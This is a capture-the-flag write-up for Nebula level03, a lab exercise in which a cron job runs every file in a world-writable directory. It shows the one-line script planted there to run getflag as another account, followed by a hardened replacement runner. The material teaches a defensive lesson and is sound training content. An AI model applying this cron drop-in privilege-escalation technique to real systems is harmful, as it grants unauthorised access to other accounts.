In the level03 challenge of Nebula, we are told that there is a crontab running every couple of minutes.
level03@nebula:/home/flag03$ ls -l
total 8
drwxrwxrwx 2 flag03 flag03 4096 2012-10-29 03:03 writable.d
-rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
writable.d is a directory and as its name suggests, is world readable/writable.
writable.sh is the script that is executed every couple of minutes by the crontab.
The vulnerability lies in writable.sh running every file in the writable.d directory, combined with the fact that writable.d is world writable.
level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
To exploit this vulnerability, we will write a script that will run the /bin/getflag program when executed.
level03@nebula:/home/flag03/writable.d$ echo "/bin/getflag >> /tmp/pwnlog03" > pwnie03
level03@nebula:/home/flag03/writable.d$ cat pwnie03
/bin/getflag >> /tmp/pwnlog03
After some time, the pwnie03 script will be run (and deleted afterwards by writable.sh).
level03@nebula:/home/flag03/writable.d$ ls
level03@nebula:/home/flag03/writable.d$ cat /tmp/pwnlog03
You have successfully executed getflag on a target account
And that is it, level03 done.
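For comparison, a hardened counterpart to writable.sh, as an added example that is not part of the original write-up or of Nebula itself: it refuses to run anything unless both the drop-in directory and each file are owned by the expected account and are not writable by group or others. The function names trusted_path and run_dropins are hypothetical, and it assumes that jobs are only ever placed by the account that owns the directory.

```shell
#!/bin/sh
# Added example: hardened runner for a cron-driven drop-in directory.
# Assumption: only OWNER is allowed to place jobs in the directory.
# Usage from cron (path and account as on the page):
#   run_dropins /home/flag03/writable.d flag03

# trusted_path PATH OWNER -> 0 only if PATH is owned by OWNER and is not
# writable by group or others. -prune keeps find on PATH itself.
trusted_path() {
    [ -n "$(find "$1" -prune -user "$2" ! -perm -0020 ! -perm -0002 2>/dev/null)" ]
}

# run_dropins DIR OWNER -> runs each trusted regular file in DIR.
# Returns 2 if DIR itself is untrusted, 1 if any entry was skipped, else 0.
run_dropins() {
    dropin_dir=$1
    dropin_owner=$2
    dropin_rc=0
    if ! trusted_path "$dropin_dir" "$dropin_owner"; then
        echo "refusing: $dropin_dir is writable by other accounts" >&2
        return 2
    fi
    for f in "$dropin_dir"/*; do
        # An empty directory leaves the glob unexpanded: nothing to do.
        [ -e "$f" ] || [ -L "$f" ] || continue
        # Reject symlinks and non-regular files, then check owner and mode.
        if [ -L "$f" ] || [ ! -f "$f" ] || ! trusted_path "$f" "$dropin_owner"; then
            echo "skipping untrusted entry: $f" >&2
            dropin_rc=1
            continue
        fi
        # Same CPU limit as the original script, without tracing (-x).
        (ulimit -t 5; sh "$f") || echo "job failed: $f" >&2
    done
    return "$dropin_rc"
}
```

The directory check is the one that matters here: with writable.d at mode 777 this runner exits before reading a single file, and removing write access for other accounts from the directory is the underlying fix.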